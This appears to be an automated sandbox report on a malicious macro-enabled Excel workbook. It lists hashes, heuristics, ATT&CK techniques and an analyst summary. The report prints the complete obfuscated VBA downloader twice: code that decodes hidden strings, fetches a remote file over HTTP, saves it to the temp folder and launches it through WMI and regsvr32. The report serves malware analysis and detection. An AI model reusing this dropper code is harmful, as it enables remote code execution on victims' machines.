Office (OOXML) / .XLSM malware analysis — malicious · 66ac4ce9437d5f54

MALICIOUS

Office (OOXML) / .XLSM

28.9 KB Created: 2022-07-14 08:29:49 UTC Authoring application: 16.0300 First seen: 2022-07-14

MD5: 19dba59c1cd8667fd8ede1e0ef7a2e71 SHA-1: 9a1739d765f4bf283768210ccc89b97e120bf166 SHA-256: 66ac4ce9437d5f5481999cd61a30b91e70451ec9d0aa4ef739e1f0c3c935b3e6

168 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer

The XLSM file contains VBA macros that utilize CreateObject and GetObject to download a file via HTTP and save it to disk. The critical heuristic 'OLE_VBA_HTTP_DROP_EXEC' confirms this behavior. The obfuscated strings 'aEX2MT.01MM.LT6OGSLXHP.' and '5hDBtaxjO.rmIADSe' are likely COM object names for MSXML2.XMLHTTP60 and ADODB.Stream respectively, used to facilitate the download. The string '91EMzTrG' is likely the HTTP method, probably 'GET'. The overall behavior indicates a macro-based downloader.

Heuristics 5

VBA project inside OOXML medium 4 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
GetObject call high OLE_VBA_GETOBJ

GetObject call
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas
b5619dea02f57383355a007faa4c6e6cd73699adcf705dacd39e82dcb64fae0b vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3916 bytes

Filename	Kind	Source	Size
`macros.bas` `b5619dea02f57383355a007faa4c6e6cd73699adcf705dacd39e82dcb64fae0b`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	3916 bytes
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Questa_cartella_di_lavoro" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Foglio1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Public Function Coolegium(ByVal tbooks As String, _ ByVal apancil As String, _ Optional ByVal rollers As String = "", _ Optional ByVal aboards As String = "", _ Optional institute As Boolean = True) As Boolean On Error GoTo esters #Const MkE = False #Const FlY = False #If MkE = True Then Dim Flibustiero As MSXML2.XMLHTTP60 Set Flibustiero = New MSXML2.XMLHTTP60 #Else Dim Flibustiero As Object Set Flibustiero = CreateObject(TrueJ("aEX2MT.01MM.LT6OGSLXHP.")) #End If #If FlY = True Then Dim PapeRs As ADODB.Stream Set PapeRs = New ADODB.Stream #Else Dim PapeRs As Object Const adTypeBinary = 1 Set PapeRs = CreateObject(TrueJ("5hDBtaxjO.rmIADSe")) #End If Flibustiero.Open TrueJ("91EMzTrG"), tbooks, False, rollers, aboards Flibustiero.Send If Flibustiero.Status = 200 Then With PapeRs .Open .Type = adTypeBinary .Write Flibustiero.responseBody .SaveToFile apancil, Abs(CInt(institute)) + 1 End With Coolegium = Len(Dir(apancil)) > 0 Else ' End If pirus: On Error Resume Next If Not PapeRs Is Nothing Then PapeRs.Close Set PapeRs = Nothing End If If Not Flibustiero Is Nothing Then Set Flibustiero = Nothing esters: Resume pirus Exit Function End Function Function NVirtu(glOng) tam = TrueJ("B;igsAwmt(Dnm:"): ho = TrueJ("uQi2rehW3Pcs8Yn_os") Set OfficeS = GetObject(tam).Get(ho) iR = OfficeS.Create(glOng) End Function Function TrueJ(integ) TrueJ = Right(ViserY("" & integ, Len(integ) * 14), Len(integ) - 5) End Function Function cMinore(O) As Variant Oo = NVirtu(O) End Function Function ViserY$(DJfun$, PJ$) Dim i&, j&, d&, k&, n&, m&, l&, GsEE&, breads$, Bistro$ n = Len(PJ) If n = 0 Then Exit Function l = Len(DJfun) m = -Int(-l / n) d = l Mod n ReDim nPJs&(1 To n), MioE(1 To n) For i = 1 To n nPJs(i) = i MioE(i) = Mid$(PJ, i, 1) For j = 1 To i - 1 If MioE(i) < MioE(j) Then breads = MioE(i): MioE(i) = MioE(j): MioE(j) = breads GsEE = nPJs(i): nPJs(i) = nPJs(j): nPJs(j) = GsEE End If Next j, i ReDim out$(1 To n, 1 To m) For i = 1 To n For j = 1 To m + (nPJs(i) > d And d > 0) k = k + 1 out(nPJs(i), j) = Mid$(DJfun, k, 1) Next j, i For j = 1 To m For i = 1 To n Bistro = Bistro & out(i, j) Next i, j ViserY = Bistro End Function Function vInteger() vInteger = HeimS & Application.UsableWidth & Application.UsableHeight & "." End Function Function pPBoolean(r As String) pPBoolean = TrueJ("(_ev2sAKgr 4rs3/") & r End Function Function HeimS() HeimS = VBA.Environ(("TEmp")) & "\" End Function Sub Selection_s() AliA = vInteger areawidths = Coolegium(TrueJ("Qhp/onco_Jts/ma.m>\t:daic"), AliA) areawidths = cMinore(pPBoolean("" & AliA)) End Sub
`vbaProject_00.bin` `e4d54ad42b68d2274a34509d45298c0aad59e714afb46954dd05731fef160798`	vba-project	OOXML VBA project: xl/vbaProject.bin	22016 bytes

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Questa_cartella_di_lavoro"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Public Function Coolegium(ByVal tbooks As String, _
                                     ByVal apancil As String, _
                                     Optional ByVal rollers As String = "", _
                                     Optional ByVal aboards As String = "", _
                                     Optional institute As Boolean = True) As Boolean
    On Error GoTo esters
    #Const MkE = False
    #Const FlY = False
    
    #If MkE = True Then
        Dim Flibustiero As MSXML2.XMLHTTP60

        Set Flibustiero = New MSXML2.XMLHTTP60
    #Else
        Dim Flibustiero As Object

        Set Flibustiero = CreateObject(TrueJ("aEX2MT.01MM.LT6OGSLXHP."))
    #End If

    #If FlY = True Then
        Dim PapeRs As ADODB.Stream
        
        Set PapeRs = New ADODB.Stream
    #Else
        Dim PapeRs      As Object
        Const adTypeBinary = 1

        
        Set PapeRs = CreateObject(TrueJ("5hDBtaxjO.rmIADSe"))
    #End If

    Flibustiero.Open TrueJ("91EMzTrG"), tbooks, False, rollers, aboards
    Flibustiero.Send
    If Flibustiero.Status = 200 Then
        With PapeRs
            .Open
            .Type = adTypeBinary
            .Write Flibustiero.responseBody
            .SaveToFile apancil, Abs(CInt(institute)) + 1
        End With
        Coolegium = Len(Dir(apancil)) > 0
    Else
'
    End If
pirus:
    On Error Resume Next
    If Not PapeRs Is Nothing Then
        PapeRs.Close
        Set PapeRs = Nothing
    End If
    If Not Flibustiero Is Nothing Then Set Flibustiero = Nothing
    
esters:

    Resume pirus
    Exit Function

End Function
Function NVirtu(glOng)
tam = TrueJ("B;igsAwmt(Dnm:"): ho = TrueJ("uQi2rehW3Pcs8Yn_os")
Set OfficeS = GetObject(tam).Get(ho)
iR = OfficeS.Create(glOng)
End Function
Function TrueJ(integ)
TrueJ = Right(ViserY("" & integ, Len(integ) * 14), Len(integ) - 5)
End Function
Function cMinore(O) As Variant
Oo = NVirtu(O)
End Function
Function ViserY$(DJfun$, PJ$)
    Dim i&, j&, d&, k&, n&, m&, l&, GsEE&, breads$, Bistro$
    n = Len(PJ)
    If n = 0 Then Exit Function
    l = Len(DJfun)
    m = -Int(-l / n)
    d = l Mod n

    ReDim nPJs&(1 To n), MioE(1 To n)
    For i = 1 To n
        nPJs(i) = i
        MioE(i) = Mid$(PJ, i, 1)
        For j = 1 To i - 1
            If MioE(i) < MioE(j) Then
                breads = MioE(i): MioE(i) = MioE(j): MioE(j) = breads
                GsEE = nPJs(i): nPJs(i) = nPJs(j): nPJs(j) = GsEE
            End If
    Next j, i
    
    ReDim out$(1 To n, 1 To m)
    For i = 1 To n
        For j = 1 To m + (nPJs(i) > d And d > 0)
            k = k + 1
            out(nPJs(i), j) = Mid$(DJfun, k, 1)
    Next j, i
    For j = 1 To m
        For i = 1 To n
            Bistro = Bistro & out(i, j)
    Next i, j
    ViserY = Bistro
End Function
Function vInteger()
vInteger = HeimS & Application.UsableWidth & Application.UsableHeight & "."
End Function
Function pPBoolean(r As String)
pPBoolean = TrueJ("(_ev2sAKgr  4rs3/") & r
End Function
Function HeimS()
HeimS = VBA.Environ(("TEmp")) & "\"
End Function
Sub Selection_s()
AliA = vInteger
areawidths = Coolegium(TrueJ("Qhp/onco_Jts/ma.m>\t:daic"), AliA)
areawidths = cMinore(pPBoolean("" & AliA))
End Sub

vbaProject_00.bin
e4d54ad42b68d2274a34509d45298c0aad59e714afb46954dd05731fef160798 vba-project OOXML VBA project: xl/vbaProject.bin 22016 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.